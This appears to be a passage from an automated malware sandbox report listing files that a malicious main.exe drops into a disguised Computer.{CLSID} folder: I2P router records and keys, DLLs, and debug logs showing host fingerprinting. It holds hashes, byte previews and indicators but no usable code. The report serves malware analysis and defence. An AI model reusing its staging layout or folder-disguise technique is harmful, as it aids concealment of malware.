Preview:	.r*...FQ-.[.W.3eD.:....8.r..qg$w"T....n..:...../.,..Ms...U.......u..R..Ok.c...>}.:L.S.L.Y.....t......'E.+....!...(..?n...M...0.x)J......,.OT.A.~(..u\|._.........0.......^B..jxW(.1..t.F.C.uI.....9..R..........L......`.....T..Yeu.U..%[.(b.@...Ey.....:j.E.iX.A.6F.;.....#..W....z.7...UYi.k..e..J.w..T:....5...Tc.9.Iq..........!"....X..D......1.3.E#.S...C$Y....4.E...................`............NTCP2.v.host=.184.146.56.27;.i=.lvQhr3vTucDU6tQ5v3kAmA==;.port=.11190;.s=,zd2TNRRMF4EREK-dNaHw4YBXICOa9X~kIYBvQt7BhGc=;.v=.2;..........SSU._.caps=.BC;.host=.184.146.56.27;.key=,eRPTRAt3Ry9ztXeN2msAj9PbsI2DvIFdMzw1yUTUljs=;.port=.11190;..........NTCP2.l.host=.::1;.i=.lvQhr3vTucDU6tQ5v3kAmA==;.port=.11190;.s=,zd2TNRRMF4EREK-dNaHw4YBXICOa9X~kIYBvQt7BhGc=;.v=.2;..........SSU.U.caps=.BC;.host=.::1;.key=,OSDg-Mcso9ptgyrA8E6lId9jbw0Zr7jmbd7NrfLIZnQ=;.port=.11190;..,.caps=.XR;.netId=.2;.router.version=.0.9.54;c.K......mM..L.z.K..~.....(7....W.t.=z.b..wW.w...he@..K..k.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rX\routerInfo-x81hGv9ywrLEXY~zAwFwOLd4cmYn1ZThghXVi-vlR-4=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1383
Entropy (8bit):	7.0565897363237
Encrypted:	false
SSDEEP:	24:4mGp7xcc17itK5ZPh06FhCCN/2Pae2M+I2b8:4mGp7xcQ7+K5ZZ0grNKB
MD5:	A25FAB1A42D6B47F560B6C3771823524
SHA1:	22DDB5A65D86E3F51710D3019AB6184490CE939D
SHA-256:	75F5D8252C433464F1DDF3B5C4A98E627E7D97F3A8D0188198B692ADFA820832
SHA-512:	2F067DA8730F6839C7C857A403926A52B33908F3FF0AA4811DAA9E2185B3DE730D1EED77601CF3518466979EA35496D04FF37C8EDD1312FBBF0BAD9C1B741525
Malicious:	false
Preview:	.@.p......Tg.-X..T4.v...O..B..........yI>..LPG.(...N..k..j."...d{..y..:......1Z~6$C...^.xo.W..e..cI....E6:.\|.......a....$.3.+-....FK....;+..R.5gr!M.... lV............32<...7.qo..@.=`..p...e.......00........7....M......=..}=.x..+....!...-.=.....I.y..x..+......D..t..xNs'*...Z)......L..%V...\|.Y..r.C.....!....)....,e.q.2...s.zQ.I4.z.8C..P.[.o...5j...3n.d..pe...o5..............#...........NTCP2.v.host=.73.246.172.43;.i=.Z1ZN9ITGjVniPzabD4dB~w==;.port=.21102;.s=,uUil4PZoa5~Wax2Q1Awm6UZdk6PMFUQ3rhSEfCQDGzM=;.v=.2;..........SSU...caps=.B6;.i=,N92wX2YlS6~~Rv~OKi6cjlf4arAJIx2c4caV5DPOkMU=;.iexp0=.1726471699;.iexp1=.1726468720;.iexp2=.1726471699;.ih1=,4IA6IQTndd7uyhxZTBYjoNZQ9wXQTpZumO3ihwBIu90=;.ih2=,L3WS69O400AFmvzrOI7EGxlKnujsETrg2EmlhDMBG~k=;.ihost0='2404:8000:1001:acc7:38d9:5ead:8b33:9f10;.ikey0=,m18~YTChgli0qtmogVJZiYISVe5~fUzEmBIAcRpAUos=;.iport0=.20990;.itag0=.1324301159;.itag1=.1900813719;.itag2=.2061627723;.key=,rptleIeP-~qjqy8QGSdgjIUW2NbQFoHohSMFz9IsL~Q=;.mtu=.1

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rX\routerInfo-xCeFJEDzV8RZWE4-jI0CSvA~7~g2bPcR2wsT9hrBxxM=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	988
Entropy (8bit):	6.650762114827123
Encrypted:	false
SSDEEP:	24:eGmvmvmvmvmvmvmvmvmvmJ7+zf9pgVrsSCT0r3fYOa8l:eG666666666KyzfjQvC2XNl
MD5:	46282E454A55979A2C9E265F2D73AC7B
SHA1:	D8725CFDD02FBF75895AAC8129353E29FEF4C093
SHA-256:	7FB68598A6339E87143CDD7BD50778A7A7C7351D7FA082BE22BCB075DCDBAFFF
SHA-512:	A9945A6183D9F092ED6E0DEAF4F8B414845C204612DA2196483EA19EE85B261CB011625E970D828C2F8A41B6B99F6EDD4F00CD36CBB16563253537D35C44283B
Malicious:	false
Preview:	2...x,.Y5.$...4.t..@..jE..o.%Spw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2.8..gO(/NIa...c.M..E......s.o6.o.............o............SSU2.\|.caps=.B4;.i=,nzAOeduv7R1pbJ6hngb6pT1X22X2Yv6kFnvQati9aiM=;.iexp0=.1726476395;.iexp1=.1726477079;.iexp2=.1726479510;.ih0=,r4WjQrHZ1Wb7V3oyLLgETiIn3gzntnTmzRPF8AHa2d0=;.ih1=,-X4kZiYpkwwPw6cbY~EPRT~41GK3QV6spEEg3m-jMNM=;.ih2=,AuDJCqtTNAdw0~cOwYndlFoYTFpk9iYI7pLP7G2g6J4=;.itag0=.1149547641;.itag1=.2430237461;.itag2=.294065463;.s=,gGblsukzCRUCAYndIVH0Z8h46hcYAHhU~nMYsvz30xY=;.v=.2;..........NTCP2.@.caps=.4;.s=,GVhjCBHVn4gUaPaWrj2ppy0rRIQvwZpriaS~4PZlbzQ=;.v=.2;..,.caps=.PU;.netId=.2;.router.version=.0.9.62;r..+./.Z"-.s,..9...P})../.>..%._4...o..o..$.....}.\.....4z..e..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rX\routerInfo-xemeU73Wq0if0-JIPNZ28T~X7~NvQ3KHLusn-fe2Wdw=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	7.126340294696187
Encrypted:	false
SSDEEP:	24:I41LN+XYqLqeFoJNMmuxMUaJtJ4QOHtJ4akaQPQOg1kaQ9RFnn:Xx+IqsTMZzU+QON6akNQOg1kt5
MD5:	D8D137238223739E7BE4713E41A8C1F8
SHA1:	AA239511C9CE7E43CAC07FC11F5E2CC47CCB784E
SHA-256:	302C9AC11350FE8DDE68B2BF1A22F05883B86DF3399F36D4FD6B5F6F45FBAE44
SHA-512:	B55F14BEA52811B8A5A53FD229F381F91CE1FDE02AA7AE6F500B009C8F127632CC02D57F08B7A5267E2E3A7E567E16512D14F122092B4EFC8F71C5DA1EEDAE0F
Malicious:	false
Preview:	.."NC..?.6S.J..aG.K>.5W..A...i...,i1#e-8........a.W.."?nZ./lSR...@..>x..@.v...+...xp.4{..H....HN.M.n.y.....)9..i..(.C[.".7.h.....h.U).sLhG<...e..K~.......'.c.P......6.c.~..-i.....t..-..(..N...&..W...C....].+h....T.X..;.).Jz...5.-....F....>....\|%h.wMU.$.>.....,1......2..-U......@..[.w..d.-B<.f..8......i..>.y..@i..'.M.!.s..=v..aF..Lo.%S.[..(!J....d.L.q.....I)*.@............................NTCP2.u.host=.45.76.244.95;.i=.cVppE0xZBteMm7e~o31uPA==;.port=.22681;.s=,Ja4SyOAu-jF~zLbgJfezBInFI4m9tkBtnUP4jJIJ2kc=;.v=.2;..........NTCP2...host=&2001:19f0:8001:279:182b:3182:ee80:edc4;.i=.cVppE0xZBteMm7e~o31uPA==;.port=.22681;.s=,Ja4SyOAu-jF~zLbgJfezBInFI4m9tkBtnUP4jJIJ2kc=;.v=.2;..........SSU2...caps=.BC;.host=.45.76.244.95;.i=,b0onWFWYMTO10j2qwlrT50dcZq6kuIQLezmKQnERIrA=;.port=.22681;.s=,jo0XqSanl6pTFwYOoS-OVmLrFbl41tKcoDKGvxUgySg=;.v=.2;..........SSU2...caps=.BC;.host=&2001:19f0:8001:279:182b:3182:ee80:edc4;.i=,b0onWFWYMTO10j2qwlrT50dcZq6kuIQLezmKQnERIrA=;.mtu=.1500;.port=.2268

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rX\routerInfo-xe~MjH2P2UkTyWqBiNUw~cei~VK9O8LNFy8mf27Q9fA=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1289
Entropy (8bit):	6.695763421207804
Encrypted:	false
SSDEEP:	24:52hmgmgmgmgmgmgmgmgmgmsv1Dhjl9jZqqrA9jZ3xqosanmYdFEqaj4Pwj5BAo5:5oNDNhr61xqLanzzPIAo5
MD5:	2FB254C940145D88E79111771BABD4E3
SHA1:	F75E979CAA3F5DC9979B2D09E5DFEFC49415600D
SHA-256:	82FD7A16F15901F0F6FA72BCABD0BD0718FE042E4D1019488A715E86565B1B69
SHA-512:	304D313BD2B05DD979658B2D83CF99BF72D2ED21E92E2F1D2A61A385B9ACDC322401A9EBA3570C2EB42D47FDB914E4A0932FC54D558C0986AEB5B45364C47F4F
Malicious:	false
Preview:	..<^%"..5.....I..0...#\|.J......O.!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n.E..b.......Z.T.V7...E+..N0..n.&............."............SSU2...caps=.BC;.host=.161.65.240.191;.i=,f-DfngEaUAZUy~s9YRlRXho4OAcIKFqfZsK7P6eHSfQ=;.port=.18793;.s=,WXC-dApoOj1ShvhfNNRcCCMH0Qv5PjX3LUXURcX2eXs=;.v=.2;..........SSU2.\|.caps=.B6;.i=,f-DfngEaUAZUy~s9YRlRXho4OAcIKFqfZsK7P6eHSfQ=;.iexp0=.1726472993;.iexp1=.1726475414;.iexp2=.1726474333;.ih0=,UHE8M0HAF6FU2CG~A7DiEp374OsBq9m8fyD0UZ9Uilk=;.ih1=,37rtNG9y5HwT0uA0uivKicstOogbuXMRj3DGILq4QWs=;.ih2=,fRad-tJvJR0V9Xw4kmNmRkbBL1UZyCMtY0nXOtIOCWc=;.itag0=.1588128416;.itag1=.1975651821;.itag2=.817846241;.s=,WXC-dApoOj1ShvhfNNRcCCMH0Qv5PjX3LUXURcX2eXs=;.v=.2;..........NTCP2.w.host=.161.65.240.191;

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rZ\routerInfo-ZLSupHTpZRIxZ99ntg1SQEd-TFGMbsAe~~LK2Mq1F2U=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	6.658532497176312
Encrypted:	false
SSDEEP:	12:UIqKulRj6tzVS3uOyj6tzOnlferT5Q3uOokAnlffrT5watL/fsy:UIjun6tUuOC6tqIrCuOontrdDt
MD5:	7CDD7D18CA0E96D1251CB3AD48D0D013
SHA1:	0CABA2558DD7905CCCADE79E0A9326315EEBC66C
SHA-256:	47A052B59E887A2D7D6D09B69375B88593733DB9E1957367823D7ADDBE677BEC
SHA-512:	21E8E5F376DAC49390B7F535C8BB395C84B8A19B7EC35929D493DF6A3D82730D6B7646CC7479FC429A1BDCD7233032436DD123043FEF6C3DBA27C7C1B354E93E
Malicious:	false
Preview:	Q.....iO..q............1;f..b..5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm......`V.aM...s.......d..u..7..........................NTCP2.v.host=.217.10.112.72;.i=.GBZDmsro9JiP-AFsem7Fsg==;.port=.10706;.s=,J-8cpfcsOZS~aifhAIKuZS7ws7M7ZhEjeiJe2qOsyic=;.v=.2;..........NTCP2...host=.2001:4db8:2380:900::6f92:8427;.i=.GBZDmsro9JiP-AFsem7Fsg==;.port=.10706;.s=,J-8cpfcsOZS~aifhAIKuZS7ws7M7ZhEjeiJe2qOsyic=;.v=.2;..........SSU2...caps=.BC;.host=.217.10.112.72;.i=,AiHBrKg1UgnZxwCnKqYu9I0zDJ5Ir~1Ztxy2faZt~Nk=;.port=.10706;.s=,PNMPqFPAftXdkMnbiLFpmhpm6sP2SQKjDIvWtRe87SI=;.v=.2;..........SSU2...caps=.BC;.host=.2001:4db8:2380:900::6f92:8427;.i=,AiHBrKg1UgnZxwCnKqYu9I0zDJ5Ir~1Ztxy2faZt~Nk=;.mtu=.1500;.port=.10706;.s=,PNMPqFPAft

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r~\routerInfo-~Go801IAJ2VpU94rQh5VAKQOR1qN3x8Cqx1GH874giA=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	808
Entropy (8bit):	6.527414692063211
Encrypted:	false
SSDEEP:	6:ceGGzjGzjGzjGzjGzjGzjGzjGzjGzjOutXQsShDFFY0hTyTxFglrUdzP4IylljPU:tQsSZFXFyfglr9TgjgSdmgdp/2YFh9Wy
MD5:	E82B6EC77F7D11E1B7744D0E226C1226
SHA1:	F359C0DDC2A92994F79FDE434A7E835306218483
SHA-256:	030AFA5A5F72894A4D012060D94E8204D38EB4A73D5CA67785FF99DB74B85F9A
SHA-512:	58A6D03E1827CF3B47D070FC094331F454A4315978C653CFDA64DBFF67A1A594D2D9B7CEC406D3FAB97FD6D763F6A90A7526C408B3CFF0F0696EF82A882842A6
Malicious:	false
Preview:	...j...0.}iA0..dww.<.Ei.......d.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i.r....i.l;k.0e...uj\|d..T5r.....i......@=.=......9...lxb...M..E.............W............NTCP2.u.host=.24.51.216.45;.i=.s5cLrUa4DhQhvb-W6CGxTg==;.port=.27375;.s=,LLKlwv-ycdYaUUxIwSJa3qOyxLb8uaHr6rl5VSLC-UI=;.v=.2;..........SSU2...caps=.BC;.host=.24.51.216.45;.i=,M6SRX0KhpkzFzHNxQQ3K40iHUjsR5~oXgxB7CwlKJ8Q=;.port=.27375;.s=,S5kgbDQyAzqljRJDEFSqLppdTGRvVda48BPKchFI9go=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;..r....?1"...z.......s=...Z..v..D.$....k...6.;......b.2.o..JL.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	6.012492001110314
Encrypted:	false
SSDEEP:	3:0fbCe4qBZNaFDYAHvR0W87HWDcbwn:0fb6qBrahYAG4n
MD5:	2980894CA47F632501F9778DD034B7AF
SHA1:	2932C4E107F9EFD3CBD4B0DC4677FC80AD86B5A2
SHA-256:	032D534BF1766DB600D7C420F6FDB18701D429DC8DCC80EA90E845598F6E74B2
SHA-512:	F69D8DFE593796D6669FDC2374BBD57689D7B93F3FB84747454030C986095DA67C95589C95A8474C84A0C9B756680EDFE876C4CD906D8C9488C76D7BA9B2C1DC
Malicious:	false
Preview:	.$3..$.g..{......r5ro.<t.}\..yj..V.VJ4..ebJt..3o\|.....g.....K.3&.vq..y..@._.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	809
Entropy (8bit):	6.643395305096442
Encrypted:	false
SSDEEP:	24:qUdYgYgYgYgYgYgYgYgYgYjFrrmPHkM0bMmV0wv2zK:qh777777777jUHLGHvt
MD5:	7A52BAA4D60D72495AAD3450E27895C6
SHA1:	74A834C348EBD2FAA7AF3CC213311280C1431339
SHA-256:	2610EC065EBA572CF65297A7E777E619F61B4347A3AB52E89F846F8373B0DBC9
SHA-512:	755D000CEB65ADDEA44574FCCCA536EBC3EB7AA759D09F65ED426839309FCABE62E49C0F1684C7F0CBBBFE9A2A25DC76F14E9A6A17D7B424C62D587AE181128D
Malicious:	true
Preview:	.hk.Y..e.X&.H.d..u...l....-Y...`.]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G..;....U......z?..w&JRS^..Y.F.............fp.............NTCP2.@.caps=.4;.s=,hiQz-rsk4ZZn8cN7HQWe-xDRcjVyb6o8dIB9XL22eWo=;.v=.2;..........SSU2...caps=.4;.i=,ul5HQNf46JpZg7pIKr8af6N4XBr6M2LZ43ahhjr8I1A=;.iexp0=.1727197652;.ih0=,e-jkj5GzeRho0jlflrONZhkaP218DvSYjr3-qgPyTdU=;.itag0=.669307908;.s=,fq3EXDEHGl4TIU2LW4s8BYz2ihII-Z0PFcA72au70lw=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.60;..dcn.9px......:.}cr..,...T.....Z0"....9..q.........H...d.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	455
Entropy (8bit):	6.191554831641883
Encrypted:	false
SSDEEP:	12:yRRydYYZVYYZVYYZVYYZVYYZVYYZVYYZVYYZVYYZVYYmXuUmILsvR/qnCo:qUdYgYgYgYgYgYgYgYgYgYjd/LsJwB
MD5:	228B90FEB6CE5D7E63B11950AD27606A
SHA1:	EFEE67E2267E3902B585F98E864812BDBA17D32D
SHA-256:	03BB3C0370F3D7A62C8E662492AC72C89F5C5E80B892BCA15B6C810FFD6381D5
SHA-512:	B63CA4EB60877BE8A522FF674C9DC1A24A013715951963167178F3D981D67AFA166A44F8DA80ACE2BA06ACF2B56F662FEEA2AA0252BBCBBF3B7AFE793C140D15
Malicious:	true
Preview:	.hk.Y..e.X&.H.d..u...l....-Y...`.]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G..;....U......z?..w&JRS^..Y.F..........Q<..~....9..............xyk.O..1E...B.Ot.t..ay.A-.s:.+2...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	96
Entropy (8bit):	6.178508854797682
Encrypted:	false
SSDEEP:	3:sv7ou+npTveIx5BUphaatqyP06jG7/ATEj41n:sjou+npTWXp4EqN6jG7ATEj41
MD5:	49B68D2346BD852BE0A77D4EC03B235B
SHA1:	847F9434472A8B4100A417D03F160D2A36E01C93
SHA-256:	55A5B51EEE1A391829CCC67DDBF23C8A5227C45BC22A4FFCEFE3ECB251530A15
SHA-512:	5044C6248FD8A5FE4A512877ECEAED23B1C9EBE39036BE9C8AD4432D63591BB3B8A485B390B60972E0413E01ECCF32129C1CEF6FD77114E0A9EE1D60CA4058D2
Malicious:	false
Preview:	~..\1..^.!M.[.<...........;...\.8b....ULD.q..[..k.]....c.R.).S.^G@...Y..H*....x\..3b..v..:.#P

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	6.229509810228039
Encrypted:	false
SSDEEP:	1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
MD5:	4E320E2F46342D6D4657D2ADBF1F22D0
SHA1:	A5ACFE6397DFFC61D243206885C389EA05428755
SHA-256:	7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
SHA-512:	E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	12926
Entropy (8bit):	5.586944793893784
Encrypted:	false
SSDEEP:	192:AziT20tApp20y8YQDdgd87CsXZP8uTZsaE8AWf3qL89FyGEW8HpU6my8FOPLrz8q:siTZ1ZWN8Yanuv2X0rnC
MD5:	2523E711F531B27E900FCDE5FA84CAC6
SHA1:	04E5962B614676995577F5BC0222BF91A09060DA
SHA-256:	3B2A0318CE8CE71316E84AB2BA786465DBE21893E3163609B211B9446CBB303D
SHA-512:	90D20B6B3BB5875F5135F7401DF1798E31EED9C9CFCE970E4B90711F0B195C1329C4F6DABC4709DFF4CBA43E6ED9649C0303B273DFB6362F3A62A5D7F19EB2D9
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg,buf_sz=10451376)..[I] (fs_path_expand) -> Done(path=%TEMP%,xpath=C:\Windows\TEMP,xpath_sz=15)..[I] (fs_path_temp) -> Done(path=C:\Windows\TEMP\zFE1sfMY,path

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.2884725801282775
Encrypted:	false
SSDEEP:	1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:	91A0DD29773FBFB7112C5FCFF1873C13
SHA1:	E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:	AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:	F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	785063
Entropy (8bit):	5.008439650882246
Encrypted:	false
SSDEEP:	192:AONiTn0+555555555555555555o5o55555555555555555555555o5555555555w:NNiTj9
MD5:	298F3DC04CB4A8321971C1509875F670
SHA1:	D2E762C6F7BA0ED6FD0E581E6D65D456A5269C82
SHA-256:	3880D4456108675D7AAA2D8503C243161154C1D8E4A74B5DEB2C732FBB7FCA04
SHA-512:	F561EF7ECEB62529F89015AB71C46F94180459BD29437D1A6BD7DA8EDFA6077D94A63B25F6EBB8E4A569D556E4D863DD0A1B3CEE3D5FF77A9155413175DAD62F
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> 